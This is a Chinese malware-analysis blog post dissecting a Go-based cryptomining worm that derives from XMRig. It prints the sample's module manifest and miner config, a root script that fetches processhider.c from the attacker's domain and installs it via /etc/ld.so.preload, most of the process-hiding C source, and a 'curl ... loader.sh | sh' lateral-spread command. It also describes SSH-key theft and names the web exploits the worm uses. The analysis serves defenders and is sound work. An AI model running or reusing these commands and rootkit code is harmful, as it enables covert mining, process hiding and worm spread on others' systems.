参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
上周末看到了深信服千里目的病毒分析报告,顿时眼睛一亮,这种集合了Windows&&Linux&&Web流量攻击的恶意程序既考察了分析人员的知识广度,又给目前安全形势带来了严峻的考验。同时也让我觉得其实二进制与web之间的关系又近了一步。全栈并不是那么遥不可及!
upx脱壳后,发现go样本,找到main函数,定位到网络连接
域名+请求文件全都明文存储在文件中
放样本跑起来,查看输出(该程序大概功能会检查恶意程序的相关模块,根据系统信息下载对应缺失模块)
请求文件,可以看到病毒作者很人性化,还为我们专门定制了双平台的攻击模块http://m.windowsupdatesupport.org/d/windowsupdatev1.json
我们以main函数中的网络请求之前下断,由此入手调试
地址下断b *0x6681ef,查看后续行为
不错!崩溃了(舰长,很有精神!),每次调试gdb都会崩溃。不浪费时间,换一种调试思路。(补充:下回试试 ltrace和strace)
tcpdump抓包,通过分析流量把该程序后续行为补全,导出http对象
好家伙都给老子下全了,剩下的我们逐个分析
(嚯,好家伙,ubuntu上给我下个pe,nbnb!!你是不是还得给我装个wine?)
二话不多说,火绒剑&&procmon,对症下药
(哟!这程序莫不是被我吓坏了?在我淫威之下屈服了?那老子就看看,不进去)
拖入ida,提示我们缺失dll库(问号脸?_?)
找到动态调用该模块的地方
根据以往经验,大概率挖矿程序都是魔改或梭哈的github开源项目,执行使用strings把字符串全dump出来,找到如下配置文件
再从github上搜一搜,终于让我找到了宁的前身
https://github.com/xmrig/xmrig
作者为了防止被认出,还专门把相关指纹替换了一遍(不错,真tm用心良苦)
实际上,xmmrig.com这个域名根本不存在!
该程序会帮宁安装挖矿所缺失的一切组件,真tm替客户着想!!!
dbus程序前身为github上xmrig挖矿的开源项目
下载processhider.c模块,编译并替换掉/usr/local/lib/libc2.28.so,并添加到/etc/ld.so.preload中,由此再运行的程序都会优先加载preload中的模块
将上述进程 kworkers | dbus | autoupdate 过滤掉,从而达到隐藏进程的目的
(好家伙,上来就先把同行们和挖矿进程都干掉。。。果然搞tm病毒也内卷,赶快收集一波,以后应急先把这脚本跑一遍)
查询出口ip,查询本地ssh私钥和pem证书文件,最后通过查询knownhost查看连接过的主机
最后通过收集到的私钥连接其他机器使其下载loader.sh进行蠕虫式传播,自此也成就闭环
具备横传能力,危险系数高
(声明,本人对web洞及java研究不深,如有错误,欢迎探讨)
首先upx脱壳,好家伙,又一个go程序,查看导出表(找到了大宝藏)
这些main类中的扫描模块,我们一个一个看(当然,攻击模块还有很多,我就不献丑了)
xxljob (弱密码登后台?)
这个无法确定是哪个洞,一开始我以为是XXL-JOB executor未授权。。但始终没找到相关json串
mongo-express远程代码执行漏洞(CVE-2019-10758)
相关链接:https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
shiro反序列化(cve-2016-4437)
相关链接:https://vulhub.org/#/environments/shiro/CVE-2016-4437/
tomcat密码爆破
(这个以前玩过,哈哈哈)
seeyon(致远OA远程代码执行漏洞)
相关链接:https://mrxn.net/news/620.html
seeyon(致远OA任意文件上传)
相关链接:https://www.cnblogs.com/sketchpl4ne/p/14515113.html
泛微oa(远程代码执行)
相关链接:https://blog.csdn.net/qq_41757280/article/details/101198845
用友oa(远程命令执行)
相关链接:https://blog.csdn.net/m0_58434634/article/details/117547164
docker daemon api 未授权访问
相关链接:
https://vulhub.org/#/environments/docker/unauthorized-rce/
structs2(包括S008\S013\S015\S016\S045\S046\S057)
jenkin插件远程代码执行(不确定)
weblogic console接口远程代码执行漏洞
fastjson 1.2.47远程命令执行
找到main.DownLoadFile函数,交叉引用
下载dubbo.jar模块
下载dubbo.jar对应的攻击参数
可以看到dubbo.jar配置文件中执行的命令为
curl httlp://m.windowsupdatesupport.org/d/loader.sh | sh横向传播,即通过已知的web漏洞进行横向传播
反编译该程序发现包括快速检测和exp(攻击模块)
执行的参数如上
至此,病毒就分析到这里了,这个样本覆盖的知识面相当全面,拿来练手再合适不过。最近两年针对企业端服务器的各种木马越来越多,二进制与web之间的鸿沟也越来越近,希望各位安全员们以此为戒,全面发展才是未来的出路
参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
#题外话
最近在找工作,希望以此抛砖引玉,找到份自己心怡的工作,工作地点(北京、天津)感谢!!
web新手,文章若分析有误欢迎共同探讨
{
"linux"
: [{
"filename"
:
"download"
,
"handle"
:
"download"
,
"url"
:
"/download"
,
"ver"
:
"20210002"
},{
"filename"
:
"dbus"
,
"handle"
:
"downrun"
,
"url"
:
"/dbus"
,
"ver"
:
"20210002"
},{
"filename"
:
"hideproc.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/hideproc.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"sshkey.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/sshkey.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"autoupdate"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate"
,
"ver"
:
"20210012"
},{
"filename"
:
"kworkers"
,
"handle"
:
"update"
,
"url"
:
"/kworkers"
,
"ver"
:
"20210008"
}
],
"windows"
: [{
"filename"
:
"service.exe"
,
"handle"
:
"update"
,
"url"
:
"/service.exe"
,
"ver"
:
"20210008"
},{
"filename"
:
"inj.exe"
,
"handle"
:
"download"
,
"url"
:
"/inj.exe"
,
"ver"
:
"20210003"
},{
"filename"
:
"runtime.dll"
,
"handle"
:
"download"
,
"url"
:
"/runtime.dll"
,
"ver"
:
"20210003"
},{
"filename"
:
"autoupdate.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate.exe"
,
"ver"
:
"20210012"
},{
"filename"
:
"updater.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/updater.exe"
,
"ver"
:
"20210003"
}]
}
{
"linux"
: [{
"filename"
:
"download"
,
"handle"
:
"download"
,
"url"
:
"/download"
,
"ver"
:
"20210002"
},{
"filename"
:
"dbus"
,
"handle"
:
"downrun"
,
"url"
:
"/dbus"
,
"ver"
:
"20210002"
},{
"filename"
:
"hideproc.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/hideproc.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"sshkey.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/sshkey.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"autoupdate"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate"
,
"ver"
:
"20210012"
},{
"filename"
:
"kworkers"
,
"handle"
:
"update"
,
"url"
:
"/kworkers"
,
"ver"
:
"20210008"
}
],
"windows"
: [{
"filename"
:
"service.exe"
,
"handle"
:
"update"
,
"url"
:
"/service.exe"
,
"ver"
:
"20210008"
},{
"filename"
:
"inj.exe"
,
"handle"
:
"download"
,
"url"
:
"/inj.exe"
,
"ver"
:
"20210003"
},{
"filename"
:
"runtime.dll"
,
"handle"
:
"download"
,
"url"
:
"/runtime.dll"
,
"ver"
:
"20210003"
},{
"filename"
:
"autoupdate.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate.exe"
,
"ver"
:
"20210012"
},{
"filename"
:
"updater.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/updater.exe"
,
"ver"
:
"20210003"
}]
}
"api"
: {
"id"
: null,
"worker-id"
: null
},
"http"
: {
"enabled"
: true,
"host"
:
"127.0.0.1"
,
"port"
:
61254
,
"access-token"
: null,
"restricted"
: true
},
"autosave"
: true,
"background"
: true,
"colors"
: true,
"title"
: true,
"randomx"
: {
"init"
:
-
1
,
"init-avx2"
:
-
1
,
"mode"
:
"auto"
,
"1gb-pages"
: false,
"rdmsr"
: true,
"wrmsr"
: true,
"cache_qos"
: false,
"numa"
: true,
"scratchpad_prefetch_mode"
:
1
},
"cpu"
: {
"enabled"
: true,
"cpu-affinity"
:
3
,
"threads"
:
3
,
"huge-pages"
: true,
"huge-pages-jit"
: false,
"hw-aes"
: null,
"priority"
: null,
"memory-pool"
: false,
"yield"
: true,
"max-threads-hint"
:
50
,
"asm"
: true,
"argon2-impl"
: null,
"astrobwt-max-size"
:
550
,
"astrobwt-avx2"
: false,
"cn/0"
: false,
"cn-lite/0"
: false
},
"opencl"
: {
"enabled"
: false,
"cache"
: true,
"loader"
: null,
"platform"
:
"AMD"
,
"adl"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"cuda"
: {
"enabled"
: false,
"loader"
: null,
"nvml"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"donate-level"
:
0
,
"donate-over-proxy"
:
0
,
"log-file"
: null,
"pools"
: [
{
"algo"
: null,
"coin"
: null,
"url"
:
"m.windowsupdatesupport.org:443"
,
"user"
:
"x"
,
"pass"
:
"x"
,
"rig-id"
: null,
"nicehash"
: true,
"keepalive"
: false,
"enabled"
: true,
"tls"
: true,
"tls-fingerprint"
: null,
"daemon"
: false,
"socks5"
: null,
"self-select"
: null,
"submit-to-origin"
: false
}
],
"print-time"
:
60
,
"health-print-time"
:
60
,
"dmi"
: true,
"retries"
:
5
,
"retry-pause"
:
5
,
"syslog"
: false,
"tls"
: {
"enabled"
: true,
"protocols"
: null,
"cert"
: null,
"cert_key"
: null,
"ciphers"
: null,
"ciphersuites"
: null,
"dhparam"
: null
},
"user-agent"
: null,
"verbose"
:
0
,
"watch"
: true,
"pause-on-battery"
: false,
"pause-on-active"
: false
"api"
: {
"id"
: null,
"worker-id"
: null
},
"http"
: {
"enabled"
: true,
"host"
:
"127.0.0.1"
,
"port"
:
61254
,
"access-token"
: null,
"restricted"
: true
},
"autosave"
: true,
"background"
: true,
"colors"
: true,
"title"
: true,
"randomx"
: {
"init"
:
-
1
,
"init-avx2"
:
-
1
,
"mode"
:
"auto"
,
"1gb-pages"
: false,
"rdmsr"
: true,
"wrmsr"
: true,
"cache_qos"
: false,
"numa"
: true,
"scratchpad_prefetch_mode"
:
1
},
"cpu"
: {
"enabled"
: true,
"cpu-affinity"
:
3
,
"threads"
:
3
,
"huge-pages"
: true,
"huge-pages-jit"
: false,
"hw-aes"
: null,
"priority"
: null,
"memory-pool"
: false,
"yield"
: true,
"max-threads-hint"
:
50
,
"asm"
: true,
"argon2-impl"
: null,
"astrobwt-max-size"
:
550
,
"astrobwt-avx2"
: false,
"cn/0"
: false,
"cn-lite/0"
: false
},
"opencl"
: {
"enabled"
: false,
"cache"
: true,
"loader"
: null,
"platform"
:
"AMD"
,
"adl"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"cuda"
: {
"enabled"
: false,
"loader"
: null,
"nvml"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"donate-level"
:
0
,
"donate-over-proxy"
:
0
,
"log-file"
: null,
"pools"
: [
{
"algo"
: null,
"coin"
: null,
"url"
:
"m.windowsupdatesupport.org:443"
,
"user"
:
"x"
,
"pass"
:
"x"
,
"rig-id"
: null,
"nicehash"
: true,
"keepalive"
: false,
"enabled"
: true,
"tls"
: true,
"tls-fingerprint"
: null,
"daemon"
: false,
"socks5"
: null,
"self-select"
: null,
"submit-to-origin"
: false
}
],
"print-time"
:
60
,
"health-print-time"
:
60
,
"dmi"
: true,
"retries"
:
5
,
"retry-pause"
:
5
,
"syslog"
: false,
"tls"
: {
"enabled"
: true,
"protocols"
: null,
"cert"
: null,
"cert_key"
: null,
"ciphers"
: null,
"ciphersuites"
: null,
"dhparam"
: null
},
"user-agent"
: null,
"verbose"
:
0
,
"watch"
: true,
"pause-on-battery"
: false,
"pause-on-active"
: false
if
[
"$EUID"
-
ne
0
]
then echo
"Please run as root"
else
if
[ `grep libc2.
28
/
etc
/
ld.so.preload` ]
then echo
"hideproc already done!!"
else
apt
-
get update
-
y
apt
-
get install build
-
essential
-
y
yum check
-
update
yum install build
-
essential
-
y
dnf groupinstall
"Development Tools"
-
y
yum group install
"Development Tools"
-
y
curl http:
/
/
m.windowsupdatesupport.org
/
d
/
processhider.c
-
o processhider.c
gcc
-
Wall
-
fPIC
-
shared
-
o libc2.
28.so
processhider.c
-
ldl
mv libc2.
28.so
/
usr
/
local
/
lib
/
-
f
grep libc2.
28
/
etc
/
ld.so.preload || echo
/
usr
/
local
/
lib
/
libc2.
28.so
>>
/
etc
/
ld.so.preload
rm
-
f processhider.c
ls >
/
tmp
/
.
1
2
>&
1
grep libc2.
28.so
/
tmp
/
.
1
&& echo >
/
etc
/
ld.so.preload
fi
fi
if
[
"$EUID"
-
ne
0
]
then echo
"Please run as root"
else
if
[ `grep libc2.
28
/
etc
/
ld.so.preload` ]
then echo
"hideproc already done!!"
else
apt
-
get update
-
y
apt
-
get install build
-
essential
-
y
yum check
-
update
yum install build
-
essential
-
y
dnf groupinstall
"Development Tools"
-
y
yum group install
"Development Tools"
-
y
curl http:
/
/
m.windowsupdatesupport.org
/
d
/
processhider.c
-
o processhider.c
gcc
-
Wall
-
fPIC
-
shared
-
o libc2.
28.so
processhider.c
-
ldl
mv libc2.
28.so
/
usr
/
local
/
lib
/
-
f
grep libc2.
28
/
etc
/
ld.so.preload || echo
/
usr
/
local
/
lib
/
libc2.
28.so
>>
/
etc
/
ld.so.preload
rm
-
f processhider.c
ls >
/
tmp
/
.
1
2
>&
1
grep libc2.
28.so
/
tmp
/
.
1
&& echo >
/
etc
/
ld.so.preload
fi
fi
/
*
*
Every process with this name will be excluded
*
/
static const char
*
process_to_filter
=
"kworkers|dbus|autoupdate"
;
/
*
*
Get a directory name given a
DIR
*
handle
*
/
static
int
get_dir_name(
DIR
*
dirp, char
*
buf, size_t size)
{
int
fd
=
dirfd(dirp);
if
(fd
=
=
-
1
) {
return
0
;
}
char tmp[
64
];
snprintf(tmp, sizeof(tmp),
"/proc/self/fd/%d"
, fd);
ssize_t ret
=
readlink(tmp, buf, size);
if
(ret
=
=
-
1
) {
return
0
;
}
buf[ret]
=
0
;
return
1
;
}
/
*
*
Get a process name given its pid
*
/
static
int
get_process_name(char
*
pid, char
*
buf)
{
if
(strspn(pid,
"0123456789"
) !
=
strlen(pid)) {
return
0
;
}
char tmp[
256
];
snprintf(tmp, sizeof(tmp),
"/proc/%s/stat"
, pid);
FILE
*
f
=
fopen(tmp,
"r"
);
if
(f
=
=
NULL) {
return
0
;
}
if
(fgets(tmp, sizeof(tmp), f)
=
=
NULL) {
fclose(f);
return
0
;
}
fclose(f);
int
unused;
sscanf(tmp,
"%d (%[^)]s"
, &unused, buf);
return
1
;
}
static struct dirent
*
(
*
original_
\
struct dirent
*
readdir(
DIR
*
dirp) \
{ \
if
(original_
original_
if
(original_
{ \
fprintf(stderr,
"Error in dlsym: %s\n"
, dlerror()); \
} \
} \
\
struct dirent
*
dir
; \
\
while
(
1
) \
{ \
dir
=
original_
if
(
dir
) { \
char dir_name[
256
]; \
char process_name[
256
]; \
if
(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
strcmp(dir_name,
"/proc"
)
=
=
0
&& \
get_process_name(
dir
-
>d_name, process_name) && \
strstr( process_to_filter,process_name)) { \
continue
; \
} \
} \
break
; \
} \
return
dir
; \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
/
*
*
Every process with this name will be excluded
*
/
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)